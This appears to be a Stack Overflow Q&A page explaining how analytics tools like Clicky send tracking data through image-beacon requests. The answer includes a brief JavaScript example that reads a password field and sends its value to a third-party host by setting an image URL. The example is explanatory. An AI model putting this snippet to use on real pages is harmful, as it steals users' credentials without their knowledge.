4

Anyone knows how Google analytics or Clicky works?

I'm stuck at the fact that I searched the entire http://static.getclicky.com/js file and didn't find any server requests in it. How does it send data without compromising its own security? Or else users could send false data by modifying the js.

Improve this question

1 Answer 1

Reset to default
4

Images: these libraries use a trick where they encode all the tracking information they want, append it to the image URL, and "send" it by requesting the image. Server-side parsing of that image filename decodes the information.

Suppose you had a password field that you wanted to send from mydomain.com to somedomain.com:

<input type='password' id='p' />

This javascript could send the contents by violating cross-site limits:

var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;

Cross-site scripting limitations don't apply to images, and when you compose the image URL request in JavaScript, no browser or logic in the world can account for all possibilities. Suppose we're lucky that GA is ethical and doesn't snag form fields.

Improve this answer
Sign up to request clarification or add additional context in comments.

7 Comments

Wow that's a nice one. But what happens to i.src? Is it discarded? And if they had to fetch the data for example ip address of the user/browser info/referring url etc, is it done in the php file or by javascript?
Some of the information (browser agent, IP address, possibly referring URL) is gleaned passively from HTTP headers. Other information, like page title, is encoded in the image URL and server-side processing decodes it.
thanks a lot for the answer. But why so much of coding just to send a bunch of variables? I can't really figure out what it is but I guess data is encoded before it is sent to avoid fraudant entries.
There is nothing in the JS code that would prevent fraudulent entries. Most of the clicky code deals with specializations, such as distinctions between content types, and revenue goals.
'and when you compose the image URL request in JavaScript, "no browser or logic in the world can account for all possibilities."' - what does this exactly mean?
|

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.